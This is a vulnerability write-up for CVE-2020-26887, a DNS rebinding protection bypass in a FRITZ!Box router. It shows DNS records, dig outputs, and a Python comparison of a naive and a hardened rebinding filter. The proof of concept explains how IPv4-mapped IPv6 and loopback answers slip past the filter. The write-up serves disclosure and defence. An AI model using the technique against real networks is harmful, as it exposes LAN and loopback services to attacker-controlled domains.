# CVE-2020-26887 DNS Rebinding Protection Bypass Vulnerability
==POC==
Suppose the following resource records (RR) are configured for different subdomains of example.com:
------------------------------------------------------------------------
private.example.com       1 IN A    192.168.178.20
local.example.com         1 IN A    127.0.0.1
privateipv6.example.com.  1 IN AAAA ::ffff:192.168.178.20
------------------------------------------------------------------------
A DNS request to the FRITZ!Box router for the subdomain private.example.com returns an empty answer, as expected: the router's DNS rebinding protection suppresses the RFC 1918 address.
------------------------------------------------------------------------
$ dig private.example.com @192.168.178.1

; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;private.example.com.           IN      A
------------------------------------------------------------------------
DNS requests for the subdomains privateipv6.example.com and local.example.com, however, return the configured resource records unchanged. The filter does not recognise an IPv4-mapped IPv6 address (::ffff:192.168.178.20) as pointing into the LAN, and it does not treat the loopback address 127.0.0.1 as internal at all. An attacker-controlled domain can therefore be rebound to a host on the victim's LAN or to services listening on the victim's own loopback interface, effectively bypassing the DNS rebinding protection:
------------------------------------------------------------------------
$ dig privateipv6.example.com @192.168.178.1 AAAA

; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;privateipv6.example.com.       IN      AAAA

;; ANSWER SECTION:
privateipv6.example.com. 1      IN      AAAA    ::ffff:192.168.178.20

$ dig local.example.com @192.168.178.1

; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;local.example.com.             IN      A

;; ANSWER SECTION:
local.example.com.      1       IN      A       127.0.0.1
------------------------------------------------------------------------
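The two bypasses above come down to what a rebinding filter actually inspects. The following is an added example, not code from the advisory or from the router vendor: a naive filter that reproduces the observed behaviour (only plain IPv4 A records are checked, and only against RFC 1918) next to a hardened one that unwraps IPv4-embedding IPv6 forms and rejects every non-global address, including loopback. The naive filter is an assumed model built to match the three observations, not the real firmware logic, and the record set is constructed from the advisory's records plus one assumed public address for contrast.

```python
import ipaddress
from typing import Callable, List, Tuple

# Constructed sample zone: the three records from the advisory above plus one
# assumed public address so the filters have something they must let through.
SAMPLE_RECORDS: List[Tuple[str, str, str]] = [
    ("private.example.com",     "A",    "192.168.178.20"),
    ("local.example.com",       "A",    "127.0.0.1"),
    ("privateipv6.example.com", "AAAA", "::ffff:192.168.178.20"),
    ("public.example.com",      "A",    "93.184.216.34"),   # assumed public host
]

RFC1918 = [
    ipaddress.IPv4Network("10.0.0.0/8"),
    ipaddress.IPv4Network("172.16.0.0/12"),
    ipaddress.IPv4Network("192.168.0.0/16"),
]


def naive_is_blocked(rdata: str) -> bool:
    """Assumed model of the pre-fix filter: only plain IPv4 rdata is parsed,
    and only RFC 1918 ranges are rejected. Written to reproduce the advisory's
    observations; it is not the vendor's code.
    """
    try:
        addr = ipaddress.IPv4Address(rdata)
    except ipaddress.AddressValueError:
        return False            # AAAA rdata never reaches the range check
    return any(addr in net for net in RFC1918)


def hardened_is_blocked(rdata: str) -> bool:
    """Block every answer that does not point at a globally routable host.

    IPv6 answers that embed an IPv4 address (IPv4-mapped ::ffff:a.b.c.d,
    6to4 2002::/16, Teredo 2001::/32) are unwrapped first so the embedded
    IPv4 address is what gets judged. is_global rejects loopback, link-local,
    CGNAT (100.64/10) and the other special-purpose ranges, not just RFC 1918.
    """
    try:
        addr = ipaddress.ip_address(rdata)
    except ValueError:
        return True             # unparsable rdata: fail closed
    if isinstance(addr, ipaddress.IPv6Address):
        inner = addr.ipv4_mapped or addr.sixtofour
        if inner is None and addr.teredo is not None:
            inner = addr.teredo[1]      # (server, client); client is the host
        if inner is not None:
            addr = inner
    return not addr.is_global


def answer(records: List[Tuple[str, str, str]], name: str,
           is_blocked: Callable[[str], bool]) -> List[Tuple[str, str]]:
    """Return the (rtype, rdata) pairs a resolver applying is_blocked would
    hand back to the client for the given owner name."""
    return [(rtype, rdata) for owner, rtype, rdata in records
            if owner == name and not is_blocked(rdata)]


if __name__ == "__main__":
    for label in ("private", "local", "privateipv6", "public"):
        fqdn = f"{label}.example.com"
        print(f"{fqdn:26} naive={answer(SAMPLE_RECORDS, fqdn, naive_is_blocked)} "
              f"hardened={answer(SAMPLE_RECORDS, fqdn, hardened_is_blocked)}")
```

Run as-is, the naive filter suppresses only private.example.com while the hardened filter suppresses all three internal records and still answers public.example.com. The point of unwrapping before the check is that a filter which judges the IPv6 address as a whole cannot reason about where the encapsulated IPv4 packet will actually end up.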